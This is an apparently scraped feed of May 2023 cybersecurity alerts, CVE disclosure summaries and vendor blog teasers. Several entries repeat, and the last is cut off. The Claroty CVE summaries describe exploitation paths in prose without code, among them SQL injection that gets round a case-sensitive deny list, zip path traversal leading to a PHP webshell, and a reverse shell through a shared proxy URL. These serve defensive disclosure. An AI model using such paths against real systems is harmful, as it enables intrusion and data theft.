Soovitame e-teenustes võtta kasutusele Web eID
2023-05-31T06:08:50Z | 1685513330

Soovitame e-teenustes võtta kasutusele ID-kaardi veebis autentimise ja allkirjastamise uue lahenduse Web eID.

https://ria.ee/uudised/soovitame-e-teenustes-votta-kasutusele-web-eid-0
Security Alert (A23-05-14): Multiple Vulnerabilities in Google Chrome
2023-05-31T04:00:00Z | 1685505600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-05-15): Vulnerability in VMware Products
2023-05-31T04:00:00Z | 1685505600

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-33181
2023-05-31T00:00:00Z | 1685491200

CWE-209 Generation of Error Message Containing Sensitive Information: Some API routes will print a stack trace when called with missing or invalid parameters revealing sensitive information about the locations of paths that the server is using. Users should upgrade to version 3.3.5 which fixes this issue.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33181
CVE-2023-33180
2023-05-31T00:00:00Z | 1685491200

CWE-89 SQL Injection: A SQL injection vulnerability was discovered in the /display/map API route inside the CMS. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values in to the bounds parameter.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33180
CVE-2023-33179
2023-05-31T00:00:00Z | 1685491200

CWE-89 SQL Injection: A SQL injection vulnerability was discovered in the nameFilter function used throughout the CMS. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values for logical operators.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33179
CVE-2023-33178
2023-05-31T00:00:00Z | 1685491200

CWE-89 SQL Injection: An SQL injection vulnerability was discovered in the /dataset/data/{id} API route inside the CMS. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values in to the filter parameter. Values allowed in the filter parameter are checked against a deny list of commands that should not be allowed, however this checking was done in a case sensitive manor and so it is possible to bypass these checks by using unusual case combinations.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33178
CVE-2023-33177
2023-05-31T00:00:00Z | 1685491200

CWE-22 Path Traversal A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33177
NEW EMA Report: WAN Transformation with SD-WAN: Establishing a Mature Foundation for SASE Success
2023-05-30T12:18:36Z | 1685449116

The post NEW EMA Report: WAN Transformation with SD-WAN: Establishing a Mature Foundation for SASE Success appeared first on Cato Networks.

https://www.catonetworks.com/resources/new-ema-report-wan-transformation-with-sd-wan-establishing-a-mature-foundation-for-sase-success/
The National Cyber Security Centre Finland’s weekly review – 21/2023
2023-05-30T10:13:15Z | 1685441595

This week we talk about a widespread Facebook scam in which accounts are hijacked on the pretext of a made-up monetary prize. Our other topics are new top-level domains and the NCSC-FI’s experts at the Disobey hacker event.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-212023
The National Cyber Security Centre Finland’s weekly review – 21/2023
2023-05-30T10:13:15Z | 1685441595

This week we talk about a widespread Facebook scam in which accounts are hijacked on the pretext of a made-up monetary prize. Our other topics are new top-level domains and the NCSC-FI’s experts at the Disobey hacker event.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-212023
Digital Transformation Is a Major Driver of Network Transformation
2023-05-29T08:44:56Z | 1685349896

Many organizations are in the midst of rapid digital transformation. In the past few years, numerous new and promising technologies have emerged and matured, promising significant benefits. For example, many organizations are rapidly adopting cloud computing, and the growing maturity of Internet of Things (IoT) devices has the potential to unlock new operational efficiencies. At... The post Digital Transformation Is a Major Driver of Network Transformation appeared first on Cato Networks.

https://www.catonetworks.com/blog/digital-transformation-is-a-major-driver-of-network-transformation/
Exploring Three Remote Code Execution Vulnerabilities in RPC Runtime
2023-05-26T14:00:00Z | 1685109600

https://www.akamai.com/blog/security-research/rpc-runtime-exploring-three-vulnerabilities
Mitsubishi Electric Corporation MELSEC iQ-F FX5U MELSOFT Direct memory corruption vulnerability
2023-05-26T00:00:00Z | 1685059200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1727
The Dark Frost Enigma: An Unexpectedly Prevalent Botnet Author Profile
2023-05-25T14:00:00Z | 1685023200

https://www.akamai.com/blog/security-research/dark-frost-botnet-unexpected-author-profile
The National Cyber Security Centre Finland’s weekly review – 20/2023
2023-05-24T13:13:46Z | 1684934026

This week we talk about the current denial-of-service attack situation and provide advice on how industrial organisations can protect themselves against cyber security incidents. We also take a look at the National Emergency Supply Agency’s newly published guide on cloud services.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-202023
The National Cyber Security Centre Finland’s weekly review – 20/2023
2023-05-24T13:13:46Z | 1684934026

This week we talk about the current denial-of-service attack situation and provide advice on how industrial organisations can protect themselves against cyber security incidents. We also take a look at the National Emergency Supply Agency’s newly published guide on cloud services.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-202023
What?s New for Developers: May 2023
2023-05-24T13:00:00Z | 1684933200

https://www.akamai.com/blog/developers/whats-new-for-developers-may-2023
ChatGPT and Cato: Get Fish, Not Tackles
2023-05-24T12:47:18Z | 1684932438

ChatGPT is all the rage these days. Its ability to magically produce coherent and typically well-written, essay-length answers to (almost) any question is simply mind-blowing. Like any marketing department on the planet, we wanted to “latch onto the news.” How can we connect Cato and ChatGPT?  Our head of demand generation, Merav Keren, made an... The post ChatGPT and Cato: Get Fish, Not Tackles appeared first on Cato Networks.

https://www.catonetworks.com/blog/chatgpt-and-cato-get-fish-not-tackles/
RIA juhib tähelepanu IPv6-e rakendamise vajalikkusele
2023-05-24T08:39:51Z | 1684917591

Eestis on viimase kümne aastaga tehtud IPv6 juurutamisel küll edusamme, kuid töö selle kasutuselevõtmisel peab kiirenema, sest see on konkurentsivõimelise digiriigi säilitamise vaatepunktist oluline.

https://ria.ee/uudised/ria-juhib-tahelepanu-ipv6-e-rakendamise-vajalikkusele
New requirements for strong electronic identification make services more secure
2023-05-24T06:50:30Z | 1684911030

The Finnish Transport and Communications Agency’s regulation on strong electronic identification and trust services enters fully into force in June 2023. The new regulation includes two important sections that make the use of electronic services even more secure than before.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/vahvan-sahkoisen-tunnistuksen-uudet-vaatimukset-tekevat-asioinnista-entista
New requirements for strong electronic identification make services more secure
2023-05-24T06:50:30Z | 1684911030

The Finnish Transport and Communications Agency’s regulation on strong electronic identification and trust services enters fully into force in June 2023. The new regulation includes two important sections that make the use of electronic services even more secure than before.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/vahvan-sahkoisen-tunnistuksen-uudet-vaatimukset-tekevat-asioinnista-entista
New requirements for strong electronic identification – information for e-services
2023-05-24T06:47:49Z | 1684910869

The Finnish Transport and Communications Agency’s Regulation M72B on strong electronic identification and trust services enters fully into force in the summer of 2023. The reformed regulation includes requirements that also affect the implementation of electronic services.

https://www.kyberturvallisuuskeskus.fi/en/news/new-requirements-strong-electronic-identification-information-e-services
New requirements for strong electronic identification – information for e-services
2023-05-24T06:47:49Z | 1684910869

The Finnish Transport and Communications Agency’s Regulation M72B on strong electronic identification and trust services enters fully into force in the summer of 2023. The reformed regulation includes requirements that also affect the implementation of electronic services.

https://www.kyberturvallisuuskeskus.fi/en/news/new-requirements-strong-electronic-identification-information-e-services
Data breach against an industrial system supplier requires the supplier’s clients to take swift action
2023-05-24T06:44:45Z | 1684910685

Preparedness efforts in organisations must also cover incidents affecting their suppliers. At worst, a key supplier may be hit by a cyber attack, which will also require its client organisations to take quick action.

https://www.kyberturvallisuuskeskus.fi/en/news/data-breach-against-industrial-system-supplier-requires-suppliers-clients-take-swift-action
Data breach against an industrial system supplier requires the supplier’s clients to take swift action
2023-05-24T06:44:45Z | 1684910685

Preparedness efforts in organisations must also cover incidents affecting their suppliers. At worst, a key supplier may be hit by a cyber attack, which will also require its client organisations to take quick action.

https://www.kyberturvallisuuskeskus.fi/en/news/data-breach-against-industrial-system-supplier-requires-suppliers-clients-take-swift-action
Security Alert (A23-05-13): Vulnerability in VMware NSX-T
2023-05-24T04:00:00Z | 1684900800

VMware has published a security advisory to address a vulnerability in VMware NSX-T.

https://www.govcert.gov.hk/en/alerts_detail.php
Statement on Diversity & Inclusion
2023-05-24T00:00:00Z | 1684886400

(v1. Approved by FIRST Board 05-17-2023) At FIRST, we believe that diversity is essential to achieving our missions of global cooperation and shared language. We embrace diversity in all its forms, reflecting the global and diverse membership of FIRST.

https://www.first.org/about/policies/diversity
Today?s Top 4 IT Investment Trends Across the Healthcare Ecosystem
2023-05-23T13:00:00Z | 1684846800

https://www.akamai.com/blog/news/top-4-it-investment-trends-healthcare-ecosystem
Trusted publishing: a new benchmark for packaging security
2023-05-23T11:00:20Z | 1684839620

Read the official announcement on the PyPI blog as well! For the past year, we’ve worked with the Python Package Index to add a new, more secure authentication method called “trusted publishing.” Trusted publishing eliminates the need for long-lived API tokens and passwords, reducing the risk of supply chain attacks and credential leaks while also […]

https://blog.trailofbits.com/2023/05/23/trusted-publishing-a-new-benchmark-for-packaging-security/
Haavatavad e-poed on ründajatele ahvatlevaks sihtmärgiks
2023-05-23T07:02:40Z | 1684825360

Vähemalt sadakond e-poodi Eestis kasutab endiselt aegunud Magento tarkvara, pannes seeläbi klientide andmed reaalsesse ohtu.

https://ria.ee/uudised/haavatavad-e-poed-rundajatele-ahvatlevaks-sihtmargiks
Security Alert (A23-05-12): Vulnerability in Apache Tomcat
2023-05-23T04:00:00Z | 1684814400

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-32787
2023-05-23T00:00:00Z | 1684800000

CWE-400: Uncontrolled Resource Consumption This security update resolves a vulnerability in the OPC UA Legacy Java Stack that enables an unauthorized attacker to block OPC UA server applications so that they can no longer serve client application.

https://claroty.com/team82/disclosure-dashboard/cve-2023-32787
Powering and Protecting Life Online with Nature-Positive Action
2023-05-22T13:00:00Z | 1684760400

https://www.akamai.com/blog/sustainability/powering-life-online-with-nature-positive-action
Why Network Visibility is Essential for Your Organization
2023-05-22T09:02:29Z | 1684746149

Most modern companies are highly reliant on their IT infrastructure for day-day business, with employees relying on numerous on-prem and cloud-based software solutions for their daily activities. However, for many companies, the network can be something of a black box. As long as data gets from point A to point B and applications continue to... The post Why Network Visibility is Essential for Your Organization appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-network-visibility-is-essential-for-your-organization/
High Threat Security Alert (A23-05-10): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-05-19T04:00:00Z | 1684468800

Apple has released iOS 15.7.6, iOS 16.5, iPadOS 15.7.6 and iPadOS 16.5 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-05-11): Multiple Vulnerabilities in Microsoft Edge
2023-05-19T04:00:00Z | 1684468800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
How to Combat Check Fraud: Leveraging Intelligence to Prevent Financial Loss
2023-05-18T14:53:32Z | 1684421612

Criminals increasingly steal checks and sell them on illicit online marketplaces, where check fraud-related services are common. Intelligence is helping the financial sector fight back The post How to Combat Check Fraud: Leveraging Intelligence to Prevent Financial Loss appeared first on Flashpoint.

https://flashpoint.io/blog/check-fraud-prevention-financial-loss/
How Technology Changes the Landscape of Our Lives
2023-05-18T13:00:00Z | 1684414800

https://www.akamai.com/blog/culture/how-technology-changes-landscape-of-lives
Achieving Zero Trust Maturity with Cato SSE 360
2023-05-18T08:16:20Z | 1684397780

Trust is a serious issue facing enterprise architectures today. Legacy architectures are designed on implicit trust, which makes them vulnerable to modern-day attacks. A Zero Trust approach to security can remedy this risk, but transitioning isn’t always easy or inexpensive. CISA, the US government’s Cybersecurity and Infrastructure Security Agency, suggests a five-pillar model to help... The post Achieving Zero Trust Maturity with Cato SSE 360 appeared first on Cato Networks.

https://www.catonetworks.com/blog/achieving-zero-trust-maturity-with-cato-sse-360/
ITL otsib ettevõtet, keda rünnata*
2023-05-18T07:03:17Z | 1684393397

Ettevõtted saavad liituda uue programmiga*, mille eesmärk on küberturvalisuse alase teadlikkuse ja võimekuse tõstmine. Programmiga on oodatud liituma Eestis tegutsevad väike- ja keskmise suurusega ettevõtted, kes vajavad küberturvalisuse teemadel tuge ja on valmis saadud kogemusi ka avalikult jagama.

https://ria.ee/uudised/itl-otsib-ettevotet-keda-runnata
High Threat Security Alert (A23-05-09): Multiple Vulnerabilities in Cisco Products
2023-05-18T04:00:00Z | 1684382400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Sessão de discussão Estratégia Nacional de Segurança do Ciberespaço
2023-05-18T00:00:00Z | 1684368000

A Resolução do Conselho de Ministros n.º 92/2019, de 5 de junho, aprovou a Estratégia Nacional de Segurança do Ciberespaço 2019-2023, prevendo a sua revisão num prazo máximo de cinco anos. Durante a sua vigência, o Centro Nacional de Cibersegurança tem vindo a proceder, conforme as competências que lhe estão atribuídas, à elaboração e atualização do Plano de Ação da Estratégia em estreita articulação com as entidades com responsabilidades na segurança do ciberespaço. Tendo o processo de revisão sido iniciado no âmbito do Conselho Superior de Segurança do Ciberespaço, a quem compete a monitorização e avaliação da sua execução, o Centro Nacional de Cibersegurança encontra-se a desenvolver ações no sentido de recolher contributos e ideias para dotar aquele Conselho das condições necessárias para a apresentação de uma Estratégia Nacional de Segurança do Ciberespaço revista e atualizada. Nesse sentido, dada a necessidade de alargar o âmbito desta discussão a todos os setores da sociedade que podem ter ou sofrer impactos em resultado da segurança do ciberespaço, o Centro Nacional de Cibersegurança irá organizar uma sessão de discussão aberta e franca entre todos os participantes, procurando identificar desafios com que Portugal se vê confrontado neste âmbito – desde logo ao nível geoestratégico, da capacitação de pessoas e organizações ou tecnológico e do conhecimento, entre outros – assim como as grandes medidas que possam ser implementadas para uma eficaz e elevada segurança do ciberespaço de interesse nacional.   Esta sessão é destinada a entidades coletivas, públicas e privadas, e a participação será por convite. As entidades coletivas interessadas em participar poderão submeter uma manifestação de interesse através do endereço ENSC.secretariado[at]cncs.gov.pt até ao dia 26 de maio 2023 com o assunto “Manifestação de interesse sessão ENSC – [nome/sigla entidade], indicando o nome dos representantes proponentes à participação e forma de contacto.

https://dyn.cncs.gov.pt/pt/detalhe/art/135778/sessao-de-discussao-estrategia-nacional-de-seguranca-do-ciberespaco
Security Alert (A23-05-08): Multiple Vulnerabilities in Google Chrome
2023-05-17T04:00:00Z | 1684296000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Advisory - Traffic Hijacking Vulnerability in Huawei Routers
2023-05-17T00:00:00Z | 1684281600

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-thvihr-7015cbae-en
Real World Crypto 2023 Recap
2023-05-16T13:54:43Z | 1684245283

Last month, hundreds of cryptographers descended upon Tokyo for the first Real World Crypto Conference in Asia. As in previous years, we dispatched a handful of our researchers and engineers to present and attend the conference. What sets RWC apart from other conferences is that it strongly emphasizes research, collaborations, and advancements in cryptography that […]

https://blog.trailofbits.com/2023/05/16/real-world-crypto-2023-recap/
CVEs: What They Are, and Ways to Mitigate Their Impact
2023-05-16T13:00:00Z | 1684242000

https://www.akamai.com/blog/security/cves-what-they-are-ways-to-mitigate-their-impact
Updated Cato DLP Engine Brings Customization, Sensitivity Labels, and More
2023-05-16T11:32:53Z | 1684236773

Last year, we launched Cato DLP  to great success. It was the first DLP engine that could protect data across all enterprise applications without the need for complex, cumbersome DLP rules.  Since then, we have been improving the DLP engine and adding key capabilities, including user-defined data types for increased control and integration with Microsoft... The post Updated Cato DLP Engine Brings Customization, Sensitivity Labels, and More appeared first on Cato Networks.

https://www.catonetworks.com/blog/updated-cato-dlp-engine-brings-customization-sensitivity-labels-and-more/
The National Cyber Security Centre Finland’s weekly review – 19/2023
2023-05-16T10:33:42Z | 1684233222

This week we talk about secure email phishing messages and the new requirements for strong electronic identification. Be sure to also check out the Cyber Weather report for April and the updates released on Patch Tuesday.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-192023
The National Cyber Security Centre Finland’s weekly review – 19/2023
2023-05-16T10:33:42Z | 1684233222

This week we talk about secure email phishing messages and the new requirements for strong electronic identification. Be sure to also check out the Cyber Weather report for April and the updates released on Patch Tuesday.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-192023
Lançamento da campanha de sensibilização Internet Segura: #LerAntesClicarDepois
2023-05-16T00:00:00Z | 1684195200

Por ocasião do Dia Mundial da Internet, que se assinala a 17 de maio, o Secretário de Estado da Digitalização e Modernização Administrativa, Mário Campolargo, e o Centro Nacional de Cibersegurança (CNCS) apresentam esta terça-feira, dia 16 de maio, a campanha nacional Internet Segura: #LerAntesClicarDepois, com o propósito de reforçar, junto de todas as pessoas e organizações, a informação sobre o bom uso do ciberespaço. Nos últimos anos, o aumento do número de incidentes de cibersegurança e de cibercrimes e o uso cada vez mais generalizado das tecnologias digitais a nível pessoal e profissional tornam premente a sensibilização constante da população para os cuidados de cibersegurança básicos.Esta campanha pedagógica e multiplataforma, fruto de um trabalho conjunto com o Conselho Superior de Segurança do Ciberespaço, é composta por uma brochura informativa, cartões com mensagens de alerta e por um kit de vídeos curtos em formato de animação, que tratam temas variados, desde o uso das palavras-passe, as compras online, o cyberbullying, até aos cuidados a ter com as redes sociais, passando pelos perigos a considerar em relação aos ataques através de emails, SMS ou telefonemas.Para além de uma divulgação nas redes sociais, esta iniciativa conta com parceria da RTP, bem como do Centro Internet Segura (coordenado pelo CNCS), universidades, municípios, empresas e organismos da administração pública para que possa chegar a todas as pessoas independentemente do seu nível de literacia digital.Para assinalar o início desta campanha, realiza-se um evento na tarde de dia 16 de maio, pelas 14.30h, no Teatro Thalia, em Lisboa, onde será realizado um debate sobre esta matéria.

https://dyn.cncs.gov.pt/pt/detalhe/art/135775/lancamento-da-campanha-de-sensibilizacao-internet-segura-lerantesclicardepois
CVE-2023-31245
2023-05-16T00:00:00Z | 1684195200

CWE-601: URL Redirection to Untrusted Site Devices using Snap One OvrC cloud are sent to a web address when accessing a web management interface using a HTTP connection. Attackers could impersonate a device and supply malicious information about the device’s web server interface. By supplying malicious parameters, an attacker could redirect the user to arbitrary and dangerous locations on the web.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31245
CVE-2023-31241
2023-05-16T00:00:00Z | 1684195200

CWE-284 Improper Access Control Snap One OvrC cloud servers contain a route an attacker can use to bypass requirements and claim devices outright.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31241
CVE-2023-31240
2023-05-16T00:00:00Z | 1684195200

CWE-798 Use of Hard-Coded Credentials Snap One OvrC Pro versions prior to 7.2 have their own locally running web server accessible both from the local network and remotely. OvrC cloud contains a hidden superuser account =accessible through hard-coded credentials.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31240
CVE-2023-31193
2023-05-16T00:00:00Z | 1684195200

CWE-319 Cleartext Transmission of Sensitive Information Snap One OvrC Pro versions prior to 7.3 use HTTP connections when downloading a program from their servers. Because they do not use HTTPS, OvrC Pro devices are susceptible to exploitation.

https://claroty.com/team82/disclosure-dashboard/cve-2023-31193
CVE-2023-28649
2023-05-16T00:00:00Z | 1684195200

CWE-20 Improper Input Validation The Hub in the Snap One OvrC cloud platform is a device used to centralize and manage nested devices connected to it. A vulnerability exists in which an attacker could impersonate a hub and send device requests to claim already claimed devices. The OvrC cloud platform receives the requests but does not validate if the found devices are already managed by another user.

https://claroty.com/team82/disclosure-dashboard/cve-2023-28649
CVE-2023-28412
2023-05-16T00:00:00Z | 1684195200

CWE-204 Observable Response Discrepancy When supplied with a random MAC address, Snap One OvrC cloud servers will return information about the device. The MAC address of devices can be enumerated in an attack and the OvrC cloud will disclose their information.

https://claroty.com/team82/disclosure-dashboard/cve-2023-28412
CVE-2023-28386
2023-05-16T00:00:00Z | 1684195200

CWE-345: Insufficient Verification of Data Authenticity Snap One OvrC Pro devices versions 7.2 and prior do not validate firmware updates correctly. The device only calculates the MD5 hash of the firmware and does not check using a private-public key mechanism. The lack of complete PKI system firmware signature could allow attackers to upload arbitrary firmware updates, resulting in code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2023-28386
CVE-2023-25183
2023-05-16T00:00:00Z | 1684195200

CWE-912 Hidden Functionality In Snap One OvrC Pro versions prior to 7.2, when logged into the superuser account, a new functionality appears that could allow users to execute arbitrary commands on the hub device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-25183
Beyond Gates and Alarms: The Scope and Impact of Physical Security Intelligence
2023-05-15T17:46:41Z | 1684172801

Exploring the role of physical security intelligence, which helps governments and commercial enterprises keep people, places, and assets safe The post Beyond Gates and Alarms: The Scope and Impact of Physical Security Intelligence appeared first on Flashpoint.

https://flashpoint.io/blog/physical-security-intelligence/
XDR Cannot Exist Without NDR
2023-05-15T16:10:00Z | 1684167000

Threat detection and response remain a key priority for organizations as ransomware and data breaches continue to disrupt business operations. With multiple solutions known as EDR, NDR, and XDR, as well as the “managed” versions known as MNDR and MXDR, it can feel like an acronym soup and be challenging to determine the best fit for an organization’s unique security needs.

https://www.ironnet.com/blog/xdr-cannot-exist-without-ndr
Introducing Windows Notification Facility’s (WNF) Code Integrity
2023-05-15T11:00:45Z | 1684148445

WNF (Windows Notification Facility) is an undocumented notification mechanism that allows communication inside processes, between processes, or between user mode processes and kernel drivers. Similar to other notification mechanisms like ETW (Event Tracing for Windows) and ALPC (Advanced Local Procedure Call), WNF communication happens over different “channels,” each representing […]

https://blog.trailofbits.com/2023/05/15/introducing-windows-notification-facilitys-wnf-code-integrity/
Email phishing and scam call campaigns made cyber weather in April unsettled
2023-05-15T07:28:49Z | 1684135729

In April, cyber weather included rays of spring sun but also spells of rain. Email phishing and scam call campaigns made cyber weather unsettled, but in terms of malware attacks, the month was sunnier than March as the number of related reports decreased slightly. This cyber weather report also includes our review of TOP 5 threats updated four times a year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2023
Email phishing and scam call campaigns made cyber weather in April unsettled
2023-05-15T07:28:49Z | 1684135729

In April, cyber weather included rays of spring sun but also spells of rain. Email phishing and scam call campaigns made cyber weather unsettled, but in terms of malware attacks, the month was sunnier than March as the number of related reports decreased slightly. This cyber weather report also includes our review of TOP 5 threats updated four times a year.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2023
FIRST POST: May-Jun 2023
2023-05-12T17:00:00Z | 1683910800

SIG updates: Human Factors in Security (HFS-SIG), EPSS SIG, SecLounge SIG; Remembering Andrew Cormack - by Serge Droz; Profile Deactivation on FIRST Portal; Board in Tokyo; Team Profiling - RWANDA NATIONAL CSIRT; Suguru Yamaguchi Fellowship Program; and New Teams.

https://www.first.org/newsroom/post/202305
Remembering Andrew Cormack - by Serge Droz
2023-05-12T16:00:00Z | 1683907200

It’s with great sadness that we learned Andrew Cormack had passed away in April. Andrew was more than just an expert. His curious and open mind inspired many in our community.

https://www.first.org/blog/20230510-remembering-andrew-cormack
Security Alert (A23-05-07): Multiple Vulnerabilities in VMware Aria Operations
2023-05-12T04:00:00Z | 1683864000

VMware has published a security advisory to address multiple vulnerabilities in VMware Aria Operations.

https://www.govcert.gov.hk/en/alerts_detail.php
Practice facilitating the reporting of vulnerabilities not yet widely adopted in Finland
2023-05-11T13:25:30Z | 1683811530

How will I find out when someone else discovers a vulnerability in my organisation’s online service? How can my organisation agree on common rules with the discoverer of a vulnerability when we do not even know each other? Offering solutions to these challenges is a proposed new practice that involves organisations always publishing contact details and policies regarding vulnerabilities in the same place. This practice was studied in a thesis project carried out for the NCSC-FI. The resulting article also includes tips for publishing a security.txt file.

https://www.kyberturvallisuuskeskus.fi/en/news/practice-facilitating-reporting-vulnerabilities-not-yet-widely-adopted-finland
Practice facilitating the reporting of vulnerabilities not yet widely adopted in Finland
2023-05-11T13:25:30Z | 1683811530

How will I find out when someone else discovers a vulnerability in my organisation’s online service? How can my organisation agree on common rules with the discoverer of a vulnerability when we do not even know each other? Offering solutions to these challenges is a proposed new practice that involves organisations always publishing contact details and policies regarding vulnerabilities in the same place. This practice was studied in a thesis project carried out for the NCSC-FI. The resulting article also includes tips for publishing a security.txt file.

https://www.kyberturvallisuuskeskus.fi/en/news/practice-facilitating-reporting-vulnerabilities-not-yet-widely-adopted-finland
Email accounts compromised in a secure email phishing campaign
2023-05-11T13:23:30Z | 1683811410

The NCSC-FI has received large numbers of reports about secure email-themed phishing messages in recent months. A new campaign became active in mid-April. According to the NCSC-FI's statistics, email accounts have been hacked in twenty different organisations. The NCSC-FI estimates that a five-figure number of secure email phishing messages has been sent in Finland in April. Multi-factor authentication is still an effective way to prevent accounts from being compromised.

https://www.kyberturvallisuuskeskus.fi/en/news/email-accounts-compromised-secure-email-phishing-campaign
Email accounts compromised in a secure email phishing campaign
2023-05-11T13:23:30Z | 1683811410

The NCSC-FI has received large numbers of reports about secure email-themed phishing messages in recent months. A new campaign became active in mid-April. According to the NCSC-FI's statistics, email accounts have been hacked in twenty different organisations. The NCSC-FI estimates that a five-figure number of secure email phishing messages has been sent in Finland in April. Multi-factor authentication is still an effective way to prevent accounts from being compromised.

https://www.kyberturvallisuuskeskus.fi/en/news/email-accounts-compromised-secure-email-phishing-campaign
Today?s Evolving Cloud Strategies Are Embracing Distributed Computing
2023-05-11T13:00:00Z | 1683810000

https://www.akamai.com/blog/cloud/todays-evolving-cloud-strategies-embracing-distributed-computing
The Race to Patch: Attackers Leverage Sample Exploit Code in WordPress Plug-in
2023-05-11T09:00:00Z | 1683795600

https://www.akamai.com/blog/security-research/attackers-leverage-sample-exploit-wordpress-plugin
Akamai?s Perspective on May?s Patch Tuesday 2023
2023-05-11T05:00:00Z | 1683781200

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-may-2023
CVE-2023-32350
2023-05-11T00:00:00Z | 1683763200

CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) Versions 00.07.00 through 00.07.03 of Teltonika’s RUT router firmware contain an operating system (OS) command injection vulnerability in a Lua service. An attacker could exploit a parameter in the vulnerable function that calls a user-provided package name by instead providing a package with a malicious name that contains an OS command injection payload. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-32350
CVE-2023-32349
2023-05-11T00:00:00Z | 1683763200

CWE-15: External Control of System or Configuration Setting Versions 00.07.00 through 00.07.03.4 of Teltonika’s RUT router firmware contain a packet dump utility that contains proper validation for filter parameters. However, variables for validation checks are stored in an external configuration file. An authenticated attacker could use an exposed UCI configuration utility to change these variables and enable malicious parameters in the dump utility, which could result in arbitrary code execution. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-32349
CVE-2023-32348
2023-05-11T00:00:00Z | 1683763200

CWE-918: Server-Side Request Forgery Teltonika’s Remote Management System versions prior to 4.10.0 contain a virtual private network (VPN) hub feature for cross-device communication that uses OpenVPN. It connects new devices in a manner that allows the new device to communicate with all Teltonika devices connected to the VPN. The OpenVPN server also allows users to route through it. An attacker could route a connection to a remote server through the OpenVPN server, enabling them to scan and access data from other Teltonika devices connected to the VPN. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-32348
CVE-2023-32347
2023-05-11T00:00:00Z | 1683763200

CWE-287: Improper Authentication Teltonika’s Remote Management System versions prior to 4.10.0 use device serial numbers and MAC addresses to identify devices from the user perspective for device claiming and from the device perspective for authentication. If an attacker obtained the serial number and MAC address of a device, they could authenticate as that device and steal communication credentials of the device. This could allow an attacker to enable arbitrary command execution as root by utilizing management options within the newly registered devices. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-32347
CVE-2023-32346
2023-05-11T00:00:00Z | 1683763200

CWE-204: Observable Response Discrepancy Teltonika’s Remote Management System versions prior to 4.10.0 contain a function that allows users to claim their devices. This function returns information based on whether the serial number of a device has already been claimed, the MAC address of a device has already been claimed, or whether the attempt to claim a device was successful. An attacker could exploit this to create a list of the serial numbers and MAC addresses of all devices cloud-connected to the Remote Management System. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-32346
CVE-2023-2588
2023-05-11T00:00:00Z | 1683763200

CWE-830: Inclusion of Web Functionality from an Untrusted Source Teltonika’s Remote Management System versions prior to 4.10.0 have a feature allowing users to access managed devices’ local secure shell (SSH)/web management services over the cloud proxy. A user can request a web proxy and obtain a URL in the Remote Management System cloud subdomain. This URL could be shared with others without Remote Management System authentication . An attacker could exploit this vulnerability to create a malicious webpage that uses a trusted and certified domain. An attacker could initiate a reverse shell when a victim connects to the malicious webpage, achieving remote code execution on the victim device. Read more: “Triple Threat: Breaking Teltonika Routers Three Ways”

https://claroty.com/team82/disclosure-dashboard/cve-2023-2588
CVE-2023-2587
2023-05-11T00:00:00Z | 1683763200

